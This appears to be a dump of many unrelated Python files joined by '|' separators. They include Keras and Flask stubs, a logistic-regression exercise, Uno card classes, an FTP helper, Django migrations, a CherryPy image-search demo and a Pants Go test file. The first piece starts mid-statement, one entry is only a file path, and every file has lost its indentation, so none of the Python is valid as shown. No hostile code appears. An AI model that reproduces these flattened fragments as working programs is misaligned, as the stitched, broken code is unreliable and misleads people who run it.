('/projeto', ProjetoHandler)
], debug=True)
|
import numpy
import pandas as pd
import keras
from keras.models import Sequential
from keras.layers import Dense,Activation,Conv2D,MaxPool2D,Flatten,Dropout
from keras.utils import np_utils
from keras.models import load_model
import numpy as np
import os
import requests
from flask import Flask
app = Flask(__name__)
import tensorflow as tf
model = load_model("my_model.h5")
in_data = np.zeros(784)
prediction = model.predict(np.array([in_data]))
del model
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run(debug=True,host='0.0.0.0')
|
from typing import Dict, List
from Controller.Utilities.GameStateInterface import GameStateSecondary
class GameState(GameStateSecondary):
def __init__(self, game_dict: [str, str or int] = {}):
self.game_dict = game_dict
self.game_dict_expected_keys = ["turnInfo", "timers", "gameObjects", "players", "annotations", "actions",
"zones"]
self.ti_dict_expected_keys = ["phase", "phase", "turnNumber", "activePlayer", "priorityPlayer",
"decisionPlayer", "nextPhase", "nextStep"]
def __str__(self):
return str(self.game_dict)
def get_full_state(self) -> Dict[str, str or int]:
return dict(self.game_dict)
def get_turn_info(self) -> Dict[str, str or int]:
turn_info_dict = None
full_state_dict = self.get_full_state()
if 'turnInfo' in full_state_dict.keys():
turn_info_dict = full_state_dict['turnInfo']
return turn_info_dict
def get_game_info(self) -> Dict[str, str or int]:
return self.get_full_state()['gameInfo']
def get_zone(self, zone_type: str, owner_seat_id: int = None) -> Dict[str, str or int]:
zones = self.get_full_state()['zones']
matching_zones = []
zone_to_return = None
for zone in zones:
if zone['type'] == zone_type:
matching_zones.append(zone)
if len(matching_zones) > 1:
for zone in matching_zones:
if zone['ownerSeatId'] == owner_seat_id:
zone_to_return = zone
elif len(matching_zones) == 1:
zone_to_return = matching_zones[0]
return zone_to_return
def get_annotations(self) -> List[Dict]:
return self.get_full_state()['annotations']
def get_actions(self) -> List[Dict]:
return self.get_full_state()['actions']
def get_players(self) -> List[Dict]:
return self.get_full_state()['players']
def get_game_objects(self) -> List[Dict[str, str or int]]:
return self.get_full_state()['gameObjects']
def is_complete(self):
is_complete = True
current_keys = self.game_dict.keys()
for expected_key in self.game_dict_expected_keys:
if expected_key not in current_keys:
is_complete = False
return is_complete
turn_info_keys = self.game_dict['turnInfo'].keys()
for expected_ti_key in self.ti_dict_expected_keys:
if expected_ti_key not in turn_info_keys:
is_complete = False
return is_complete
return is_complete
def __update_dict(self, dict_to_update: [str, str or int], dict_with_update: [str, str or int]):
for key in dict_with_update:
if key in dict_to_update.keys():
item_to_update = dict_to_update[key]
item_with_update = dict_with_update[key]
if isinstance(item_with_update, dict):
if isinstance(item_to_update, dict):
self.__update_dict(item_to_update, item_with_update)
else:
temp_dict = {}
self.__update_dict(temp_dict, item_with_update)
dict_to_update[key] = temp_dict
elif isinstance(item_with_update, int) or isinstance(item_with_update, str) or isinstance(
item_with_update, list):
dict_to_update[key] = dict_with_update[key]
else:
print("Uh oh something went wrong... :(")
else:
dict_to_update[key] = dict_with_update[key]
def update(self, updated_state: 'GameStateSecondary') -> None:
self.__update_dict(self.game_dict, updated_state.get_full_state())
|
# import numpy as np
# import scipy.optimize
# import matplotlib.pyplot as plt
# def sigmoid(x):
# g = 1. / (1 + np.e ** (-1 * x))
# g = np.reshape(g, [len(g),])
# return g
# def costFunction(theta, x, y):
# h = sigmoid(x.dot(theta))
# m = len(y)
# J = 1. / m * -1 * (np.transpose(y).dot(np.log(h)) + np.transpose(1 - y).dot(np.log(1 - h)))
# return J
# def gradient(theta, x, y):
# h = sigmoid(x.dot(theta))
# m,n = x.shape
# g = np.reshape(1. / m * (np.transpose(x).dot(h - y)), [n,])
# return g
# def predict(theta, x, y):
# result = sigmoid(x.dot(theta))
# result[np.where(result >= 0.5)] = 1
# result[np.where(result < 0.5)] = 0
# print(np.mean(np.float64(result ==y)))
# if __name__ == "__main__":
# data = np.loadtxt(fname = "ex2data1.txt", delimiter = ",")
# x = data[:, 0:2]
# y = data[:, 2]
# m,n = x.shape
# x = np.c_[np.ones([m,1]), x]
# initial_theta = np.zeros([n + 1, 1])
# result = np.reshape(scipy.optimize.fmin_bfgs(f = costFunction, x0 = initial_theta, fprime = gradient, args = (x,y)),[n+1, 1])
# # print(gradient(initial_theta, x, y))
# print(result)
# # predict(result, x, y)
# print(sigmoid(np.array([1, 45, 85]).dot(result)))
# pos = np.where(y == 1)
# neg = np.where(y == 0)
# plot1 = plt.scatter(x[pos, 1], x[pos, 2], marker = 'o', c = "r")
# plot2 = plt.scatter(x[neg, 1], x[neg, 2], marker = 'x', c = "b")
# plt.legend([plot1, plot2], ["Admitted", "Not admitted"], loc = "upper right")
# x = np.linspace(30, 100, 100)
# y = np.linspace(30, 100, 100)
# z = np.zeros([len(x), len(y)])
# for i in range(len(x)):
# for j in range(len(y)):
# z[i][j] = np.array([1, x[i], y[j]]).dot(result)
# z = np.transpose(z)
# plt.contour(x,y,z,[0,0.01],linewidth=2.0)
# plt.show()
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as scop
def sigmoid(x):
g = 1. / (1 + np.e ** (-1 * x))
return g
def costFunction(theta, x, y):
h = sigmoid(x.dot(theta))
m = len(y)
J = 1. / m * -1 * (np.transpose(y).dot(np.log(h)) + np.transpose(1 - y).dot(np.log(1 - h)))
return J
def gradient(theta, x, y):
h = np.reshape(sigmoid(x.dot(theta)), [-1, 1])
m, n = x.shape
g = np.reshape(1. / m * (np.transpose(x).dot(h - y)), [n, ])
return g
if __name__ == "__main__":
data = np.loadtxt(fname = "ex2data1.txt", delimiter = ",")
x = data[:, 0:2]
y = data[:, 2]
m, n = x.shape
x = np.c_[np.ones([m, 1]), x]
y = np.reshape(y, [-1, 1])
initial_theta = np.zeros([n + 1, 1])
result = np.reshape(scop.fmin_bfgs(f = costFunction, x0 = initial_theta, fprime = gradient, args = (x, y)), [-1, 1])
print(result)
pos = np.where(y == 1)
neg = np.where(y == 0)
plot1 = plt.scatter(x[pos, 1], x[pos, 2], marker = "o", c = "b")
plot2 = plt.scatter(x[neg, 1], x[neg, 2], marker = "x", c = "r")
plt.legend([plot1, plot2], ["Admitted", "No-Admitted"], loc = "upper right")
x = np.linspace(30, 100, 100)
y = np.linspace(30, 100, 100)
z = np.zeros([len(x), len(y)])
for i in range(len(x)):
for j in range(len(y)):
z[i][j] = np.array([1, x[i], y[j]]).dot(result)
z = z.T
plt.contour(x, y, z, [0, 0.01], linewidth=2.0)
plt.show()
|
#!/bin/python
# delete-dssstore.py
#
# A simple python script to delete .DS_Store files
#
# 3zbumban
# 2019
import os
import sys
import argparse
import time
from hurry.filesize import size
CWD = os.getcwd()
to_delete = ".DS_Store"
argumetnparser = argparse.ArgumentParser(description="Usage: delete-dsstore.py -p/--path <PATH> or: delete-dsstore.py -c/--cwd/--current-dir \nExample: delete-dsstore.py -p /Users/angelito")
argumetnparser.add_argument("-p", "--path", dest="target_path", type=str, required=False, help="the path you want to start from as a string \"C:\\example\\dir\\...\\...\"")
argumetnparser.add_argument("-c", "--current-dir", "--cwd", dest="use_cwd", action="store_true", help="add this flag to use the scripts dir as the starting point")
argumetnparser.add_argument("-v", "--verbose", dest="v", action="store_true", help="outputs every file that gets checked for debug purpose, slows down the script")
args, unknowns = argumetnparser.parse_known_args()
def welcome():
print("\n" * 5)
print("""
/$$ /$$ /$$$$$$$ /$$$$$$ /$$
| $$ | $$ | $$__ $$ /$$__ $$ | $$
/$$$$$$$ /$$$$$$ | $$ | $$ \ $$| $$ \__/ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$
/$$__ $$ /$$__ $$| $$ | $$ | $$| $$$$$$ /$$_____/|_ $$_/ /$$__ $$ /$$__ $$ /$$__ $$
| $$ | $$| $$$$$$$$| $$ | $$ | $$ \____ $$ | $$$$$$ | $$ | $$ \ $$| $$ \__/| $$$$$$$$
| $$ | $$| $$_____/| $$ | $$ | $$ /$$ \ $$ \____ $$ | $$ /$$| $$ | $$| $$ | $$_____/
| $$$$$$$| $$$$$$$| $$ | $$$$$$$/| $$$$$$/ /$$$$$$$/ | $$$$/| $$$$$$/| $$ | $$$$$$$
\_______/ \_______/|__/ .|_______/ \______//$$$$$$|_______/ \___/ \______/ |__/ \_______/
|______/
by 3zbumban
""")
def main():
welcome()
try:
if(args.use_cwd):
path = CWD
print("[i] using scripts dir: {}".format(path))
elif(args.target_path):
if(os.path.isdir(args.target_path)):
path = args.target_path
else:
print("[e] given path is not a dir\n[i] did you use a backslash (\"\\\") to much?")
sys.exit(-1)
else:
print("[i] exit no path given...")
sys.exit(0)
if input("[i] your path to clean: {} \n[?] do you want to start? (y/n) ".format(path)) == "y":
start = time.time()
# 1. Check if parameter is a dir
if os.path.isdir(path):
# 2. Clear file counter
i = 0
acc_f_size = 0
# 3. walks all files in the directory
for root, sub, files in os.walk(path):
for file in files:
if(args.v):
print("[i] checking: {}".format(os.path.abspath(os.path.join(root, file))))
# 4. Checks if exists .DS_Store file
if file == to_delete:
# 5. Get full path of current .DS_Store file
fullpath = os.path.abspath(os.path.join(root, file))
# get file size
acc_f_size += os.path.getsize(fullpath)
print("[i] Deleting: \"{}\" \n[i] deleted: {}".format(fullpath, size(acc_f_size)))
# 6. Remove file
os.remove(fullpath)
i += 1
# 7. print result
end = time.time()
print("\n\n\n[i] number of deleted files: {} \n[i] total filesize: {} \n[i] time elapsed: {:4.4f}sec".format(i, size(acc_f_size), (end - start) % 60))
else:
sys.exit(0)
else:
print("[i] you choose to abort the script...")
sys.exit(0)
except KeyboardInterrupt:
end = time.time()
print("[i] KeyboardINterrupt, aborting")
print("\n\n\n[i] number of deleted files: {} \n[i] total filesize: {} \n[i] time elapsed: {:4.4f}sec".format(i, size(acc_f_size), (end - start) % 60))
if __name__ == "__main__":
main()
|
import numpy as np
import tensorflow as tf
from app.ds.graph.preprocessed_graph import Graph
from app.model.params import SparseModelParams
from app.utils.constant import TRAIN, LABELS, FEATURES, SUPPORTS, MASK, VALIDATION, TEST, DROPOUT, GCN, \
FF, GCN_POLY
class DataPipeline():
'''Class for managing the data pipeline'''
def __init__(self, model_params, data_dir, dataset_name):
self.graph = None
self._populate_graph(model_params, data_dir, dataset_name)
self.data_dir = data_dir
self.dataset_name = dataset_name
self.model_params = model_params
self.num_elements = -1
self.feature_size = self.graph.features.shape[1]
self.node_size = self.graph.features.shape[0]
self.label_size = self.graph.labels.shape[1]
self.support_size = self.model_params.support_size
self.supports = []
self.placeholder_dict = {}
self.train_feed_dict = {}
self.validation_feed_dict = {}
self.test_feed_dict = {}
self._populate_feed_dicts()
def _populate_graph(self, model_params, data_dir, dataset_name):
self.graph = Graph(model_name=model_params.model_name, sparse_features=model_params.sparse_features)
self.graph.read_data(data_dir=data_dir, dataset_name=dataset_name)
def _set_placeholder_dict(self):
'''
Logic borrowed from
https://github.com/tensorflow/tensorflow/blob/r1.4/tensorflow/examples/tutorials/mnist/fully_connected_feed.py'''
labels_placeholder = tf.placeholder(tf.int32, shape=(None, self.label_size), name=LABELS)
features_placeholder = tf.placeholder(tf.float32, shape=(None, self.feature_size), name=FEATURES)
if (self.model_params.sparse_features):
features_placeholder = tf.sparse_placeholder(tf.float32, shape=(None, self.feature_size), name=FEATURES)
mask_placeholder = tf.placeholder(tf.float32, name=MASK)
# For disabling dropout during testing - based on https://stackoverflow.com/questions/44971349/how-to-turn-off-dropout-for-testing-in-tensorflow
dropout_placeholder = tf.placeholder_with_default(0.0, shape=(), name=DROPOUT)
support_placeholder = []
for i in range(self.support_size):
support_placeholder.append(tf.sparse_placeholder(tf.float32, name=SUPPORTS + str(i)))
self.placeholder_dict = {
FEATURES: features_placeholder,
LABELS: labels_placeholder,
SUPPORTS: support_placeholder,
MASK: mask_placeholder,
DROPOUT: dropout_placeholder
}
def _prepare_feed_dict(self, labels, features, mask_indices, dropout):
y = np.zeros(labels.shape)
y[mask_indices,:] = labels[mask_indices,:]
placeholder_dict = self.placeholder_dict
feed_dict = {
placeholder_dict[LABELS]: y,
placeholder_dict[FEATURES]: features,
placeholder_dict[MASK]: map_indices_to_mask(indices=mask_indices, mask_size=self.node_size),
placeholder_dict[DROPOUT]: dropout
}
for i in range(self.support_size):
feed_dict[placeholder_dict[SUPPORTS][i]] = self.supports[i]
return feed_dict
def _prepare_data_node_classifier(self, dataset_splits, shuffle_data=False):
self._set_placeholder_dict()
features = self.graph.features
labels = self.graph.labels
supports = self.graph.compute_supports(model_params=self.model_params)
if (self.model_params.sparse_features):
self.num_elements = features.nnz
if(self.graph.preprocessed):
train_index, val_index, test_index = self.graph.read_data(dataset_name=self.dataset_name, data_dir=self.data_dir)
else:
if(shuffle_data):
shuffle = np.arange(self.node_size)
np.random.shuffle(shuffle)
features = features[shuffle]
labels = labels[shuffle]
train_index, val_index, test_index = self.graph.get_node_mask(dataset_splits=dataset_splits)
features = convert_sparse_matrix_to_sparse_tensor(features)
self.supports = list(
map(
lambda support: convert_sparse_matrix_to_sparse_tensor(support), supports
)
)
return [[labels, features],
[train_index, val_index, test_index]]
def _prepare_data(self, dataset_splits, shuffle_data=False):
if(self.model_params.model_name in set([GCN, GCN_POLY, FF])):
return self._prepare_data_node_classifier(dataset_splits=dataset_splits,
shuffle_data=shuffle_data)
else:
return None
def _populate_feed_dicts(self, dataset_splits=[140, 500, 1000]):
'''Method to populate the feed dicts'''
[[labels, features],
[train_index, val_index, test_index]] = self._prepare_data(dataset_splits=dataset_splits)
self.train_feed_dict = self._prepare_feed_dict(labels=labels,
features=features,
mask_indices=train_index,
dropout=self.model_params.dropout)
self.validation_feed_dict = self._prepare_feed_dict(labels=labels,
features=features,
mask_indices=val_index,
dropout=0)
self.test_feed_dict = self._prepare_feed_dict(labels=labels,
features=features,
mask_indices=test_index,
dropout=0)
def get_feed_dict(self, mode=TRAIN):
if mode == TRAIN:
return self.train_feed_dict
elif mode == VALIDATION:
return self.validation_feed_dict
elif mode == TEST:
return self.test_feed_dict
else:
return None
def get_placeholder_dict(self):
'''Method to populate the feed dicts'''
return self.placeholder_dict
def get_sparse_model_params(self):
return SparseModelParams(
num_elements=self.num_elements,
feature_size=self.feature_size
)
def map_indices_to_mask(indices, mask_size):
'''Method to map the indices to a mask'''
mask = np.zeros(mask_size, dtype=np.float32)
mask[indices] = 1.0
return mask
def convert_sparse_matrix_to_sparse_tensor(X):
'''
code borrowed from https://stackoverflow.com/questions/40896157/scipy-sparse-csr-matrix-to-tensorflow-sparsetensor-mini-batch-gradient-descent
'''
coo = X.tocoo()
indices = np.mat([coo.row, coo.col]).transpose()
return tf.SparseTensorValue(indices, coo.data, coo.shape)
|
from enum import Enum
# Enumerator to store color value
class Color(Enum):
RED = 1
BLUE = 2
YELLOW = 3
GREEN = 4
# Greater than and less than compare the Color Enumerator value
def __gt__(self, other):
if other == None:
return False
return self.value > other.value
def __lt__(self, other):
if other == None:
return True
return self.value < other.value
# Card is basic uno playing card
class Card:
def __init__(self, value, color):
# Color and value (number) of card
self.color = color
self.value = value
# Action is called whenever the card is played. Handles special actions for cards like Wild card and Skip cards. Returns dict of attributes to update.
def action(self):
return True
def __str__(self):
return "{:<8} {:<15}".format(self.color.name, self.value)
# Greater than and less than compare by color first then by value.
def __gt__(self, other):
if self.color == other.color:
return self.value > other.value
return self.color > other.color
def __lt__(self, other):
if self.color == other.color:
return self.value < other.value
return self.color < other.color
# Skip card
class Skip(Card):
def __init__(self, color):
super().__init__(-1, color)
# Inform the game controller to skip the next turn
def action(self):
return {"skip_next_player": True}
def __str__(self):
return "{:<8} SKIP".format(self.color.name)
# Reverse card
class Reverse(Card):
def __init__(self, color):
super().__init__(-1, color)
# Inform the game controller to reverse the direction of play
def action(self):
return {"reverse_direction_of_play": True}
def __str__(self):
return "{:<8} REVERSE".format(self.color.name)
class PlusTwo(Card):
def __init__(self, color):
super().__init__(-1, color)
# Inform game controller to skip the next player and have the next player draw 2 cards
def action(self):
return {"skip_next_player": True, "draw_next_player": 2}
def __str__(self):
return "{:<8} PLUS TWO".format(self.color.name)
class Wild(Card):
def __init__(self):
super().__init__(-1, Color.RED)
# Prompt user to set color for wild card
def _set_color_(self):
self.color = None
print(self.color)
while self.color == None:
color_choice = input("Enter a color for the wild card (R/G/B/Y): ").lower()
if color_choice == "r":
self.color = Color.RED
elif color_choice == "g":
self.color = Color.GREEN
elif color_choice == "b":
self.color = Color.BLUE
elif color_choice == "y":
self.color = Color.YELLOW
# Have user set the color of the Wild card
def action(self):
self._set_color_()
return {}
def __str__(self):
return "WILD"
class WildPlusFour(Wild):
def __str__(self):
return "WILD PLUS 4"
# Set color and inform game controller to have the next player draw 4 cards
def action(self):
self._set_color_()
return {"draw_next_player": 4}
|
import datetime
import ftplib
from prettytable import PrettyTable
class ExtraccionFtp:
def __init__(self,host,usuario,clave):
self.host = host
self.usuario = usuario
self.clave = clave
self.ftp = ftplib.FTP(self.host)
def login(self):
try:
self.ftp.login(self.usuario,self.clave)
except Exception as e:
self.full(str(e),"login")
def full(self,msg, level ):
str_dattime = str(datetime.datetime.now())
print('{0} - {1} - {2}'.format( str_dattime, level, msg))
def close(self):
try:
self.ftp.quit()
except Exception as e:
self.full(str(e),"close")
def void_ls_comand(self,path_dir):
try:
self.ftp.cwd(path_dir)
self.ftp.dir()
except Exception as e:
full(str(e),'void_ls_comand')
def size_fmt(self,num,suffix='B'):
try:
for unit in ['','K','M','G','T','P','E','Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num,unit,suffix)
num /= 1024.0
return "%.1f%s%s" % (num,'Yi',suffix)
except Exception as e:
self.full(str(e),"size_fmt")
def get_datetime_format(date_time):
date_time=date_time.strptime(date_time, "%Y%m%d%H%M%S")
return date_time.strftime("%Y-%m-%d %H:%M:%S")
def is_file(self,filename):
current = self.ftp.pwd()
try:
self.ftp.cwd(filename)
except:
self.ftp.cwd(current)
return True
self.ftp.cwd(current)
return False
def download_file(self,path_remote,path_local,file_name):
try:
self.ftp.cwd(path_remote)
new_file = open(path_local+'/'+file_name, 'wb') ;
self.ftp.retrbinary("RETR " + file_name ,new_file.write);
return "success"
except Exception as e:
return str(e)
self.full(str(e),"download_file")
def getTablePretty(selft,header,rows):
table = PrettyTable(header)
for row in rows:
table.add_row(row)
return table
def get_content_nlst(self,path_dir):
try:
array_files = []
self.ftp.cwd(path_dir)
for file_name in self.ftp.nlst():
if(self.is_file(file_name)):
size = self.ftp.size(file_name)
size = self.size_fmt(size)
object = {'size':size,'name':file_name}
array_files.append(object)
return array_files
except Exception as e:
self.full(str(e),"get_content_nlst")
|
#!/usr/bin/python
def divisors(n):
count = 0
for j in range(int(n / 2), 0, -1):
if n % j == 0:
count += j
if count > n:
return True
return count > n
sum = 0
arr = []
for i in range(2, 28124):
if divisors(i):
arr.append(i)
d = {}
for i in range(0, len(arr)):
for j in range(i, len(arr)):
d[arr[i] + arr[j]] = True
for i in range(0, 28124):
if i not in d:
sum += i
print(sum)
|
from albus import fields
def step_0001(m):
m.create(
'Author', [
('name', fields.StringField()),
('initials', fields.StringField(size=fields.TINY)),
('rank', fields.IntegerField()),
('birthdate', fields.DateTimeField()),
]
)
m.create(
'Book', [
('author', fields.IntegerField()),
('title', fields.StringField(size=fields.BIG)),
]
)
m.reference('Book', 'author', 'Author')
def step_0002(m):
m.add(
'Book', [
('pages', fields.IntegerField()),
]
)
|
# Generated by Django 3.1.7 on 2021-03-07 04:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0015_auto_20210307_0134'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='answers',
),
migrations.AddField(
model_name='answer',
name='post',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='answers_post', to='api.post'),
),
]
|
from class_Student import Student
# Instantiate class with 5 students
student0 = Student("Alan", 29, 4.0)
student1 = Student("Benji", 27, 2.0)
student2 = Student("Dave", 29, 3.4)
student3 = Student("Dave", 29, 3.4)
student4 = Student("Edgar", 23, 3.1)
# Create test array of 5 students
student_array = [student0, student1, student2, student3, student4]
print("\n")
print("Initialized student array...\n")
# Demonstrates method: __str__
print("Demonstrates method: __str__")
print(str(student0))
print(str(student1))
print(str(student2))
print(str(student3))
print(str(student4))
print("\n")
# Demonstrates method: __lt__
print("Demonstrates method: __lt__")
print(student0.__lt__(student1))
print(student1.__lt__(student4))
print(student2.__lt__(student1))
print(student3.__lt__(student2))
print(student4.__lt__(student3))
print("\n")
# Demonstrates method: __eq__
print("Demonstrates method: __eq__")
print(student0.__eq__(student1))
print(student1.__eq__(student4))
print(student2.__eq__(student3))
print(student3.__eq__(student2))
print(student4.__eq__(student3))
print("\n")
# Demonstrates method: __hash__
print("Demonstrates method: __hash__")
print(student0.__hash__())
print(student1.__hash__())
print(student2.__hash__())
print(student3.__hash__())
print(student4.__hash__())
print("\n")
# (b) Write test code that exercises these methods using sorted() and dict()
# Test 1:
def myFn(s):
return s.gpa
print("[Test 1] Returns students by lowest to highest GPA using sorted():")
test1 = sorted(student_array, key=myFn)
for student in test1:
print(student.name + ', ' + str(student.gpa))
print("\n")
# Test 2:
print("[Test 2] Returns students whose GPA is GTE to 3.0 using sorted() and dict():")
dict1 = {}
for student in student_array:
if student.gpa >= 3.0:
dict1.update({ student.name: student.gpa})
dict1 = sorted(dict1, reverse=True)
print(dict1)
print("\n")
# Test 3:
print("[Test 3] Determines if student has 4.0 GPA using __hash__():")
list2 = []
for student in student_array:
if student.gpa == 4.0:
list2.append(student.__hash__())
for student in student_array:
if student.__hash__() in list2:
print(student.name + ' has a perfect GPA!')
print("\n")
# (c) Sort students in order of increasing GPA using a lambda expression
print("[Test 4] Sorts students in order of increasing GPA using a lambda expression:")
test3 = sorted(student_array, key=lambda student: student.gpa)
for lambda_student in test3:
print(lambda_student.name + ', ' + str(lambda_student.gpa))
print("\n...End of tests")
|
/Users/daniel/anaconda/lib/python3.6/__future__.py
|
import cherrypy, os, urllib, pickle
from n6_searching_images import imagesearch
from n6_searching_images.vocabulary import Vocabulary
import random
class SearchDemo(object):
def __init__(self):
# load list of images
with open('ukbench_imlist.pkl', 'rb') as f:
self.imlist = pickle.load(f)
self.nbr_images = len(self.imlist)
self.ndx = list(range(self.nbr_images))
# load vocabulary
with open('vocabulary.pkl', 'rb') as f:
self.voc = pickle.load(f)
# set max number of results to show
self.maxres = 15
# header and footer html
self.header = """
<!doctype html>
<head>
<title>Image search example</title>
</head>
<body>
"""
self.footer = """
</body>
</html>
"""
def index(self, query=None):
self.src = imagesearch.Searcher('test.db', self.voc)
html = self.header
html += """
<br />
Click an image to search. <a href='?query='>Random selection</a> of images.
<br /><br />
"""
if query:
# query the database and get top images
res = self.src.query(query)[:self.maxres]
for dist, ndx in res:
imname = self.src.get_filename(ndx)
html += "<a href='?query=" + imname + "'>"
html += "<img src='" + imname + "' width='100' />"
html += "</a>"
else:
# show random selection if no query
random.shuffle(self.ndx)
for i in self.ndx[:self.maxres]:
imname = self.imlist[i]
html += "<a href='?query=" + imname + "'>"
html += "<img src='" + imname + "' width='100' />"
html += "</a>"
html += self.footer
return html
index.exposed = True
config = {
'global':{
'server.socket_host': "127.0.0.1",
'server.socket_port': 8080,
'server.thread_pool': 50,
'tools.sessions.on': True
},
'/': {
'tools.staticdir.root': os.path.abspath(os.path.dirname(__file__)), # must be absolute path
'tools.staticdir.on': True,
'tools.staticdir.dir': ''
}
}
cherrypy.quickstart(SearchDemo(), '/', config=config)
|
# 27.Merge the Tools!
# 28.itertools.product()
# > import itertools
# > 순열: permutations(list, 선택 개수), 조합: combinations(list, 선택 개수)
# > 여러 리스트 간의 곱집합(데카르트의 곱): product(list, list, ....), *list 넣으면 리스트 안의 문자열 하나하나에 대해서도 모든 경우의 수를 구함
# > product(list, repeat=2) == product(list, list) repeat 사용이 가능한데, repeat은 인자에 대한 반복임
# > tuple을 반환하기 때문에 list()처리해줘야함
# 29.collections.Counter()
# > collections Counter는 파이썬 기본함수의 count 처럼 해당 리스트 안의 개수를 세주는 함수로
# count와는 다르게 들어 있는 수를 key, 개수를 values로 하는 딕셔너리 형식의 counter 객체를 반환 (딕셔너리와 동일하게 사용 가능)
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param A : head node of linked list
# @return an integer
def lPalin(self, A):
if not A.next:
return 1
vals = [A.val]
current = A.next
while current:
vals.append(current.val)
current = current.next
current = A
for i in range(len(vals) / 2):
if current.val != vals[-i - 1]:
return 0
current = current.next
return 1
|
import subprocess, os
images = os.listdir('./img')
#qss = os.listdir('./qss')
f = open('resource.qrc', 'w+')
f.write(u'<!DOCTYPE RCC>\n<RCC version="1.0">\n<qresource>\n')
for item in images:
f.write(u'<file alias="img/'+ item +'">img/'+ item +'</file>\n')
#f.write(u'<file alias="icons/'+ item +'">icons/'+ item +'</file>\n')
#for item in qss:
# f.write(u'<file alias="qss/'+ item +'">qss/'+ item +'</file>\n')
f.write(u'</qresource>\n</RCC>')
f.close()
pipe = subprocess.Popen(r'pyrcc4 -py3 -o Resource_rc.py resource.qrc', stdout = subprocess.PIPE, stdin = subprocess.PIPE, stderr = subprocess.PIPE, creationflags=0x08)
|
import unittest
from katas.beta.lightswitches import lightswitch
class LightswitchTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(lightswitch(3), 1)
def test_equals_2(self):
self.assertEqual(lightswitch(4), 2)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2019-11-09 06:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=100, unique=True)),
('staff', models.BooleanField(default=True)),
('customer', models.BooleanField(default=True)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='profile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='custom_user.User'),
),
]
|
import forca
import adivinhacao
print(14*"*")
print("Bem vindo a minha biblioteca de jogos!")
print(14*"*")
print("""----Escolha o jogo----
(1) Forca (2) Advinhação""")
escolha_jogo = int(input("Escolha: "))
if (escolha_jogo == 1):
forca.jogar()
elif(escolha_jogo == 2):
adivinhacao.jogar()
|
import datetime
import time
from sawtooth_sdk.processor.handler import TransactionHandler
from sawtooth_sdk.processor.exceptions import InvalidTransaction
SYNC_TOLERANCE = 60 * 5
def is_active(object):
return max(object.infos, key=lambda obj: obj.timestamp).active
def validate_timestamp(timestamp):
"""Validates that the client submitted timestamp for a transaction is not
greater than current time, within a tolerance defined by SYNC_TOLERANCE
NOTE: Timestamp validation can be challenging since the machines that are
submitting and validating transactions may have different system times
"""
dts = datetime.datetime.utcnow()
current_time = round(time.mktime(dts.timetuple()) + dts.microsecond / 1e6)
if (timestamp - current_time) > SYNC_TOLERANCE:
raise InvalidTransaction(
'Timestamp must be less than local time.'
' Expected {0} in ({1}-{2}, {1}+{2})'.format(
timestamp, current_time, SYNC_TOLERANCE))
def validate_record(record):
latest_state = max(record.infos, key=lambda obj: obj.timestamp)
return latest_state
def validate_issuer(state, issuer_public_key):
pass
def latest_manager_public_key_record(record):
return max(record.managers, key=lambda obj: obj.timestamp).manager_public_key
def _validate_manager(signer_public_key, record):
pass
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import textwrap
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.goals.test import GoTestFieldSet, GoTestRequest
from pants.backend.go.goals.test import rules as test_rules
from pants.backend.go.goals.test import transform_test_args
from pants.backend.go.target_types import GoModTarget, GoPackageTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
build_pkg_target,
first_party_pkg,
go_mod,
implicit_linker_deps,
import_analysis,
link,
sdk,
tests_analysis,
third_party_pkg,
)
from pants.backend.go.util_rules.sdk import GoSdkProcess
from pants.core.goals.test import TestResult, get_filtered_environment
from pants.core.target_types import FileTarget
from pants.core.util_rules import source_files
from pants.engine.addresses import Address
from pants.engine.process import ProcessResult
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*test_rules(),
*assembly.rules(),
*build_pkg.rules(),
*build_pkg_target.rules(),
*first_party_pkg.rules(),
*go_mod.rules(),
*link.rules(),
*import_analysis.rules(),
*implicit_linker_deps.rules(),
*sdk.rules(),
*target_type_rules.rules(),
*tests_analysis.rules(),
*third_party_pkg.rules(),
*source_files.rules(),
get_filtered_environment,
QueryRule(TestResult, [GoTestRequest.Batch]),
QueryRule(ProcessResult, [GoSdkProcess]),
],
target_types=[GoModTarget, GoPackageTarget, FileTarget],
)
rule_runner.set_options(["--go-test-args=-v -bench=."], env_inherit={"PATH"})
return rule_runner
def test_transform_test_args() -> None:
assert transform_test_args(["-v", "--", "-v"], timeout_field_value=None) == (
"-test.v",
"--",
"-v",
)
assert transform_test_args(["-run=TestFoo", "-v"], timeout_field_value=None) == (
"-test.run=TestFoo",
"-test.v",
)
assert transform_test_args(["-run", "TestFoo", "-foo", "-v"], timeout_field_value=None) == (
"-test.run",
"TestFoo",
"-foo",
"-test.v",
)
assert transform_test_args(["-timeout=1m", "-v"], timeout_field_value=None) == (
"-test.timeout=1m",
"-test.v",
)
assert transform_test_args(["-timeout", "1m", "-v"], timeout_field_value=None) == (
"-test.timeout",
"1m",
"-test.v",
)
